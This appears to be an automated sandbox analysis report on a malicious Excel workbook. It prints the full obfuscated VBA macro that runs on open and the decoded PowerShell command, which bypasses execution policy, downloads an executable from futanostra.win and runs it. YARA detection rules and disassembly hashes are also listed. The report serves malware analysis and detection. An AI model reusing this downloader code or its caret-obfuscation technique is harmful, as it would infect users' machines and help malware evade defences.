                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:2
                  Start time:09:09:23
                  Start date:31/10/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
                  Imagebase:0x4ac80000
                  File size:345'088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.412257968.0000000000320000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.412257968.000000000035E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:09:09:24
                  Start date:31/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
                  Imagebase:0x13ff20000
                  File size:443'392 bytes
                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Disassembly

                  Code Analysis

                  Call Graph

                  Module: Foglio1

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Foglio1"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: ThisWorkbook

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "ThisWorkbook"

                  2

                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Executed Functions

                  Subroutine

                  Workbook_OpenAPIs: 2, Strings: 0, Number of lines: 6, Relevance: 8.756

                  APIsMeta Information

                  xlSecondary

                  Shell

                  		Shell("cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"",0) -> 3588
                  LineInstructionMeta Information
                  10

                  Sub Workbook_Open()

                  11

                  If xlSecondary > 0 Then

                  xlSecondary

                  executed
                  12

                  nailscopper = zygotas

                  13

                  Shell nailscopper & glientveiuun, 0

                  Shell("cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"",0) -> 3588

                  executed
                  14

                  Endif

                  15

                  End Sub

                  Function

                  zygotasAPIs: 17, Strings: 1, Number of lines: 5, Relevance: 27.005

                  APIsMeta Information

                  Part of subcall function magaraje@ThisWorkbook: Array

                  Part of subcall function magaraje@ThisWorkbook: Now

                  Part of subcall function magaraje@ThisWorkbook: Chr

                  Part of subcall function magaraje@ThisWorkbook: Array

                  Part of subcall function magaraje@ThisWorkbook: Now

                  Part of subcall function magaraje@ThisWorkbook: Minute

                  Part of subcall function magaraje@ThisWorkbook: Second

                  Part of subcall function magaraje@ThisWorkbook: Timer

                  Part of subcall function magaraje@ThisWorkbook: Hour

                  Part of subcall function tuplook@ThisWorkbook: Array

                  Part of subcall function tuplook@ThisWorkbook: Array

                  Part of subcall function tuplook@ThisWorkbook: Array

                  Part of subcall function tuplook@ThisWorkbook: Second

                  Part of subcall function tuplook@ThisWorkbook: Now

                  Part of subcall function tuplook@ThisWorkbook: Array

                  Part of subcall function tuplook@ThisWorkbook: Array

                  Part of subcall function tuplook@ThisWorkbook: Array

                  StringsDecrypted Strings
                  "/c """
                  LineInstructionMeta Information
                  76

                  Function zygotas()

                  77

                  tuumnote = galvolero

                  executed
                  78

                  seneglrive = "/c """

                  79

                  zygotas = magaraje + "e" + " " + " " + seneglrive + tuplook + tuumnote

                  80

                  End Function

                  Function

                  tuplookAPIs: 8, Strings: 8, Number of lines: 9, Relevance: 24.009

                  APIsMeta Information

                  Array

                  Array

                  Array

                  Second

                  Now

                  Array

                  Array

                  Array

                  StringsDecrypted Strings
                  "^he""l^""l"""
                  "^""U"
                  " "
                  "^Ec"""
                  "^E""R""S"""
                  "w"""
                  """O"
                  "p""^"
                  LineInstructionMeta Information
                  49

                  Function tuplook()

                  50

                  bobsleys = Array(Null, Null, Null, 1, "^he" + "l^" + "l" + "", 0, Null, Null, Null, Null, Null, Null, 0, Null, Null, Null)

                  Array

                  executed
                  51

                  regpistol = Array(Null, Null, Null, 1, Null, Null, Null, Null, Null, Null, Null, Null, Null, "^" + "U", Null, Null)

                  Array

                  52

                  intertvn = Array(Null, " ", Null, Second(Now), Null, Second(Now), "^Ec" + "", Null, Null, Second(Now), Null, Null, Null, Null, Null, Null, Null, Second(Now))

                  Array

                  Second

                  Now

                  53

                  caprureflags = Array(Null, Null, 1, "^E" + "R" + "S" + "", Null, Null, Null, Null, 0, Null, Null, 0, Null, Null, 0, Null)

                  Array

                  54

                  neelwater = Array(Null, 1, Null, Null, Null, 0, Null, Null, Null, "w" + "", Null, Null, Null, Null, Null, Null, Null)

                  Array

                  55

                  tooool = "" & "O"

                  56

                  tuplook = "p" + "^" + tooool + Array(neelwater(9) + caprureflags(3) + bobsleys(4) + poltergeystore + " -N" + "o" + vangafoot(12) + "I" + "l" + "e^" + footballr + "X" + intertvn(6) + regpistol(13) & chivasgoa)(0)

                  Array

                  57

                  End Function

                  Function

                  magarajeAPIs: 9, Strings: 3, Number of lines: 6, Relevance: 18.006

                  APIsMeta Information

                  Array

                  Now

                  Chr

                  Array

                  Now

                  Minute

                  Second

                  Timer

                  Hour

                  StringsDecrypted Strings
                  "e"
                  ""c"M"
                  "D""."
                  LineInstructionMeta Information
                  22

                  Function magaraje()

                  23

                  madagaskarus = "e"

                  executed
                  24

                  harddisks = Array(Null, Now(), Null, Now(), Null, Now(), Now(), Null, "c" + Chr(77), Now(), Now(), Now(), Now(), Null, Null)

                  Array

                  Now

                  Chr

                  25

                  tupertup = Array(Now(), Minute(Now), Second(Now), Now(), Timer(), "D" + "." & madagaskarus + "x", Timer(), Hour(Now), Timer(), Timer(), Timer(), Now())

                  Array

                  Now

                  Minute

                  Second

                  Timer

                  Hour

                  26

                  magaraje = harddisks(8) & tupertup(5)

                  27

                  End Function

                  Function

                  chivasgoaAPIs: 6, Strings: 5, Number of lines: 6, Relevance: 16.506

                  APIsMeta Information

                  Array

                  Now

                  Array

                  Now

                  Array

                  Now

                  StringsDecrypted Strings
                  "s """
                  "p""a^"""
                  "A"""
                  "Y"
                  " ""B^"
                  LineInstructionMeta Information
                  43

                  Function chivasgoa()

                  44

                  singhh = Array(Null, Null, Null, Now(), Null, Now(), Null, Now(), Null, "s " + "", Null, Now(), Null, Null, Null, Null)

                  Array

                  Now

                  executed
                  45

                  deepip = Array(Null, Now(), Null, Null, Null, Null, Null, Null, Now(), Null, Null, Null, "p" + "a^" + "", Null, Null, Null)

                  Array

                  Now

                  46

                  yehopol = Array(Now(), Null, "Y", Now(), Now(), Now(), Null, Null, "A" + "", Now(), Null, Now(), Null, Null, Null, Null, Null, Null)

                  Array

                  Now

                  47

                  chivasgoa = " " + "B^" + yehopol(2) + deepip(12) + "S^" + singhh(9)

                  48

                  End Function

                  Function

                  poltergeystoreAPIs: 4, Strings: 6, Number of lines: 7, Relevance: 15.007

                  APIsMeta Information

                  Array

                  Array

                  Array

                  Chr

                  StringsDecrypted Strings
                  "D"
                  "s""""^ 1"""
                  " -""W^""I""n"""
                  "-n""O^"""
                  "^N""i^N""t"""
                  "^.""e"
                  LineInstructionMeta Information
                  36

                  Function poltergeystore()

                  37

                  hhneg = "D"

                  executed
                  38

                  valeygod = Array(Null, Null, Null, Null, Null, 1, Null, Null, Null, 1, Null, Null, "s" + "" + "^ 1" + "", Null, Null, Null, Null, Null)

                  Array

                  39

                  ganovey = Array(Null, Null, 1, " -" + "W^" & "I" + "n" & "", Null, 0, Null, Null, Null, Null, "-n" + "O^" + "", Null, Null, Null, Null, Null)

                  Array

                  40

                  poolnum = Array(Null, Null, Null, 1, Null, 0, Null, Null, Null, Null, Null, Null, Null, Null, 1, "^N" + "i^N" + "t" + "", 0)

                  Array

                  41

                  poltergeystore = "^." + "e" & molibdensefe & ganovey(10) + "l " + "-No" + poolnum(15) + Chr(94) & ganovey(3) & hhneg + "O^w" + valeygod(12)

                  Chr

                  42

                  End Function

                  Function

                  vangafootAPIs: 6, Strings: 2, Number of lines: 4, Relevance: 12.004

                  APIsMeta Information

                  Array

                  Now

                  Minute

                  Second

                  Hour

                  Timer

                  StringsDecrypted Strings
                  "O"
                  "p""r"
                  LineInstructionMeta Information
                  32

                  Function vangafoot()

                  33

                  zeebdd = "O"

                  executed
                  34

                  vangafoot = Array(Now(), Now(), Now(), Now(), Now(), Now(), Now(), Minute(Now), Second(Now), Minute(Now), Second(Now), Second(Now), "p" + "r" + zeebdd + "^" + "F", Now(), Hour(Now), Timer(), Now())

                  Array

                  Now

                  Minute

                  Second

                  Hour

                  Timer

                  35

                  End Function

                  Function

                  galvoleroAPIs: 5, Strings: 1, Number of lines: 4, Relevance: 9.004

                  APIsMeta Information

                  Part of subcall function maltibalo@ThisWorkbook: Randomize

                  Part of subcall function maltibalo@ThisWorkbook: Space

                  Part of subcall function maltibalo@ThisWorkbook: Chr

                  Part of subcall function maltibalo@ThisWorkbook: Int

                  Part of subcall function maltibalo@ThisWorkbook: Rnd

                  StringsDecrypted Strings
                  "$fos=''""',''';$h""it='d""f""il';$""fd=""');s""ta';$dr='(ne';$ed""='j""ect '"";$ipo=""'syst';$""kos='t.we';$rem='e""nt).do';$sad"
                  LineInstructionMeta Information
                  18

                  Function galvolero()

                  19

                  galvolero = "$fos=''" + "',''';$h" + "it='d" + "f" + "il';$" + "fd=" + "');s" + "ta';$dr='(ne';$ed" + "='j" + "ect '" + ";$ipo=" + "'syst';$" + "kos='t.we';$rem='e" + "nt).do';$sad"

                  executed
                  20

                  galvolero = galvolero + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + "a" + "';$" + "uy='" + maltibalo(3) + "';$ji" + "='" + maltibalo(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

                  21

                  End Function

                  Function

                  maltibaloAPIs: 5, Strings: 0, Number of lines: 7, Relevance: 6.257

                  APIsMeta Information

                  Randomize

                  Space

                  Chr

                  Int

                  Rnd

                  LineInstructionMeta Information
                  58

                  Function maltibalo(LenLetter as Integer)

                  59

                  Randomize

                  Randomize

                  executed
                  60

                  maltibalo = Space(LenLetter)

                  Space

                  61

                  For iCount% = 1 To LenLetter

                  62

                  Mid (maltibalo, iCount%, 1) = Chr((Int(97 + (Rnd() * 26))))

                  Chr

                  Int

                  Rnd

                  63

                  Next

                  64

                  End Function

                  Function

                  molibdensefeAPIs: 0, Strings: 1, Number of lines: 4, Relevance: 1.254

                  StringsDecrypted Strings
                  "^""x"
                  LineInstructionMeta Information
                  65

                  Function molibdensefe()

                  66

                  deopooter = "^" + "x"

                  executed
                  67

                  molibdensefe = deopooter + "^e" + "^" + " "

                  68

                  End Function

                  Function

                  footballrAPIs: 0, Strings: 1, Number of lines: 4, Relevance: 1.254

                  StringsDecrypted Strings
                  """ "
                  LineInstructionMeta Information
                  72

                  Function footballr()

                  73

                  nubic = "" + " "

                  executed
                  74

                  footballr = nubic + "-" + "e"

                  75

                  End Function

                  Function

                  glientveiuunAPIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

                  StringsDecrypted Strings
                  """"""
                  LineInstructionMeta Information
                  69

                  Function glientveiuun()

                  70

                  glientveiuun = """" + ""

                  executed
                  71

                  End Function

                  Non-Executed Functions

                  Function

                  enchteinerdomAPIs: 0, Strings: 1, Number of lines: 4, Relevance: 1.254

                  StringsDecrypted Strings
                  "t"
                  LineInstructionMeta Information
                  28

                  Function enchteinerdom()

                  29

                  enchteinerdom = "t"

                  30

                  enchteinerdom = enchteinerdom + "h"

                  31

                  End Function

                  Reset < >

                    Executed Functions

                    Function 000007FE8B61162D Relevance: .5, Instructions: 479COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.411691291.000007FE8B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fe8b610000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3df473024f871f31ba644091f335335a413b8449fa59fc8777286c8ab23865d0
                    • Instruction ID: a08e55e903795bb50ae8e32e3e37c0faf74e77800fbcb3f40c6d456385b8b539
                    • Opcode Fuzzy Hash: 3df473024f871f31ba644091f335335a413b8449fa59fc8777286c8ab23865d0
                    • Instruction Fuzzy Hash: 67D1B02191E7C50FE34BA73C58652B57FE2DF47254F2901EBD48ECB1A3D918981AC362
                    Function 000007FE8B6157DD Relevance: .5, Instructions: 464COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.411691291.000007FE8B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fe8b610000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 09098d17a755065768ce27752fe66ea56e084fe7e351da1f6db467922f0665c7
                    • Instruction ID: 43e13427276610a4f2c43cd7d28c5dc2aa50d85ccba03366a719ba295e9f03f4
                    • Opcode Fuzzy Hash: 09098d17a755065768ce27752fe66ea56e084fe7e351da1f6db467922f0665c7
                    • Instruction Fuzzy Hash: E2D1023050E7C91FE757A73C98546B5BFA4EF87260B1901EBD0CDCB1A3D618A816C3A2

                    Non-executed Functions

                    Function 000007FE8B61356E Relevance: .3, Instructions: 337COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.411691291.000007FE8B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fe8b610000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c141745b3b06730025d168f5d85b656f6b94cd81eda64f82fa95f3732cf02632
                    • Instruction ID: 275b9e26a43097c981a28824526dd68ba15e707a17a2cac083fe507339a8f38e
                    • Opcode Fuzzy Hash: c141745b3b06730025d168f5d85b656f6b94cd81eda64f82fa95f3732cf02632
                    • Instruction Fuzzy Hash: A4A1582050EBCA1FE743977C98246A27FF1EF4B254F1901EBD48DCB1A3D618991AC362